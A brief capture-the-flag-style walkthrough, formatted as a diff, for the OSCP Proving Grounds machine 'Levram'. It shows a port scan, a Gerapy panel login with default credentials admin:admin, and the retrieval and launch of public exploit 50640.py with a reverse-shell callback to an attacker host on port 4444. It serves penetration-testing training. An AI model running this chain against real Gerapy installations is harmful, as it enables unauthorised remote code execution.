OSCP Proving Grounds – Levram Walkthrough

 nmap -sC -sV -p- $IP --open

-# Login to Gerapy panel at :8000 (admin:admin)
+# Login at :8000 with admin:admin

 searchsploit -m python/remote/50640.py

-# Manually create dummy project in Gerapy UI
+# Create dummy project in Gerapy UI

 python3 50640.py --target $RHOST -p 8000 -L $LHOST -P 4444